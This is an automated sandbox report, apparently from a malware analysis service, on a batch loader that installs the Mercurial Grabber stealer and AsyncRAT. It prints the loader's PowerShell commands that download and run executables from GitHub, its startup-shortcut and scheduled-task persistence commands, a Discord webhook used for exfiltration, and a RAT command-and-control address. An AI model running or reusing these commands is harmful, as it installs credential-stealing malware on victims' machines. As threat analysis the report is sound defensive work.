Analysis
-
max time kernel
150s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 12:18
Static task
static1
Behavioral task
behavioral1
Sample
OTEYZ_Loader.bat
Resource
win7-20241023-en
General
-
Target
OTEYZ_Loader.bat
-
Size
1KB
-
MD5
f3f83ae17a3f81e0265b9ce7e480bd4e
-
SHA1
994d8d5b533fd09630b45a0d0404f65557e83d5d
-
SHA256
412476007cd57ca529c83c386125249fbe0952a2522f5d838ffd3fb10a6e1f74
-
SHA512
cc0480e5cf4b8d6ca9318f806587bf121dc8feb553263e4756b43b568cf38d93ce94a467e87878f299d3fdabc66e178c8dafa96e3e5fda51bbfd7a6b4220bf39
Malware Config
Extracted
mercurialgrabber
https://discordapp.com/api/webhooks/1308883657456619530/0_Ad9EyrLZrIMKH4vjM6XHyvCJJtKddsiohDSyvCWZ8HIxpyNxmVJgrKb_zO-jqSHSO0
Extracted
asyncrat
Default
technical-southwest.gl.at.ply.gg:58694
-
delay
1
-
install
true
-
install_file
WINDOWS.exe
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Mercurialgrabber family
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/files/0x0008000000023c84-58.dat family_asyncrat -
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
output.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions output.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 7 4996 powershell.exe 9 4996 powershell.exe 21 684 powershell.exe 22 684 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid Process 2380 powershell.exe 768 powershell.exe 684 powershell.exe 4996 powershell.exe -
Downloads MZ/PE file
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
output.exedescription ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools output.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion output.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Loader.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation Loader.exe -
Drops startup file 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
output.exeLoader.exeWINDOWS.exepid Process 2628 output.exe 3716 Loader.exe 4636 WINDOWS.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 19 ip4.seeip.org 34 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 output.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum output.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S output.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString output.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 2320 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
output.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName output.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeLoader.exeWINDOWS.exepid Process 4996 powershell.exe 4996 powershell.exe 2380 powershell.exe 2380 powershell.exe 684 powershell.exe 684 powershell.exe 768 powershell.exe 768 powershell.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 3716 Loader.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe 4636 WINDOWS.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exeoutput.exepowershell.exeLoader.exeWINDOWS.exedescription pid Process Token: SeDebugPrivilege 4996 powershell.exe Token: SeDebugPrivilege 2380 powershell.exe Token: SeDebugPrivilege 684 powershell.exe Token: SeDebugPrivilege 2628 output.exe Token: SeDebugPrivilege 768 powershell.exe Token: SeDebugPrivilege 3716 Loader.exe Token: SeDebugPrivilege 3716 Loader.exe Token: SeDebugPrivilege 4636 WINDOWS.exe Token: SeDebugPrivilege 4636 WINDOWS.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exeLoader.execmd.execmd.exedescription pid Process procid_target PID 2492 wrote to memory of 4996 2492 cmd.exe 83 PID 2492 wrote to memory of 4996 2492 cmd.exe 83 PID 2492 wrote to memory of 2380 2492 cmd.exe 85 PID 2492 wrote to memory of 2380 2492 cmd.exe 85 PID 2492 wrote to memory of 2628 2492 cmd.exe 86 PID 2492 wrote to memory of 2628 2492 cmd.exe 86 PID 2492 wrote to memory of 684 2492 cmd.exe 88 PID 2492 wrote to memory of 684 2492 cmd.exe 88 PID 2492 wrote to memory of 768 2492 cmd.exe 93 PID 2492 wrote to memory of 768 2492 cmd.exe 93 PID 2492 wrote to memory of 3716 2492 cmd.exe 94 PID 2492 wrote to memory of 3716 2492 cmd.exe 94 PID 3716 wrote to memory of 4988 3716 Loader.exe 96 PID 3716 wrote to memory of 4988 3716 Loader.exe 96 PID 3716 wrote to memory of 5016 3716 Loader.exe 98 PID 3716 wrote to memory of 5016 3716 Loader.exe 98 PID 5016 wrote to memory of 2320 5016 cmd.exe 100 PID 5016 wrote to memory of 2320 5016 cmd.exe 100 PID 4988 wrote to memory of 2364 4988 cmd.exe 101 PID 4988 wrote to memory of 2364 4988 cmd.exe 101 PID 5016 wrote to memory of 4636 5016 cmd.exe 104 PID 5016 wrote to memory of 4636 5016 cmd.exe 104 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\OTEYZ_Loader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2492 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/DD/releases/download/D/output.exe -OutFile C:\Users\Admin\Desktop\output.exe -ErrorAction SilentlyContinue"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut1 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\output.lnk'); $shortcut1.TargetPath = 'C:\Users\Admin\Desktop\output.exe'; $shortcut1.Save()"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Users\Admin\Desktop\output.exeC:\Users\Admin\Desktop\output.exe2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/Realmastercoder69/uu/releases/download/dss/Loader.exe -OutFile C:\Users\Admin\Desktop\Loader.exe -ErrorAction SilentlyContinue"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$WScriptShell = New-Object -ComObject WScript.Shell; $shortcut2 = $WScriptShell.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Loader.lnk'); $shortcut2.TargetPath = 'C:\Users\Admin\Desktop\Loader.exe'; $shortcut2.Save()"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768
-
-
C:\Users\Admin\Desktop\Loader.exeC:\Users\Admin\Desktop\Loader.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"' & exit3⤵
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WINDOWS" /tr '"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:2364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD810.tmp.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:2320
-
-
C:\Users\Admin\AppData\Roaming\WINDOWS.exe"C:\Users\Admin\AppData\Roaming\WINDOWS.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD50f6a3762a04bbb03336fb66a040afb97
SHA10a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA25636e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69
-
Filesize
1KB
MD59843d1de2b283224f4f4b8730ccc919f
SHA1c053080262aef325e616687bf07993920503b62b
SHA256409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1
SHA51213d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de
-
Filesize
1KB
MD5db33d1f268f71ebbe2ca4f16306db678
SHA14a9b354d3d691f9cdb640508ed55bc0b645f08b7
SHA256d6bb50779262464463ca4ccab9cd39d912d92cf36d7b42f290d39be9430625af
SHA512cab27bfd374c13b5f3f758dee75e60a45061eca7ad3e9a3b51297ac4e8707c03570bc63364ef1c6f03ee835adf2727115d827929f63ec63a42d1dac517291f99
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
151B
MD5e74957c4db8cad34790853bda3db9167
SHA18c20a64360392e072bf16dca985eef5015aa0fc3
SHA2560c19ba7744a3813bf47efafc29049ac222cc3111276ffd304d340cdafd9f256c
SHA512d4a37568856b18a8ee17575866455e209c2e80298a878fdc27c440b7f797e9ff9cee99de9f67357ceba53c388d04826e7c664c795d36a72ff4cda678d7001c1b
-
Filesize
63KB
MD57ceb11ebb7a55e33a82bc3b66f554e79
SHA18dfd574ad06ded662d92d81b72f14c1914ac45b5
SHA256aea3e89e45a33441bcd06c990282f8601eb960a641c611222dce2fe09685e603
SHA512d8cd7af50996015163c8926fc7b6df6a6e2c0b3f6c8fcff37cad5b72fed115f7134723d99f61a20576b83e67107a3a410f5ef2312191446b3d0759cb739e6ccd
-
Filesize
41KB
MD5a0e598ec98a975405420be1aadaa3c2a
SHA1d861788839cfb78b5203686334c1104165ea0937
SHA256e6ac8a6dac77f9873024f50befb293b9cf6347aa2e093cd863b551d9c8da5f8d
SHA512e5ee500a8dcddd72e727cfa24e51093cd2b088f7ef89089f1d24145baa41c1ac46bf6be73bfd8cb15e2549349da8c2547d4e391b6e3a456621524fe0f83f9585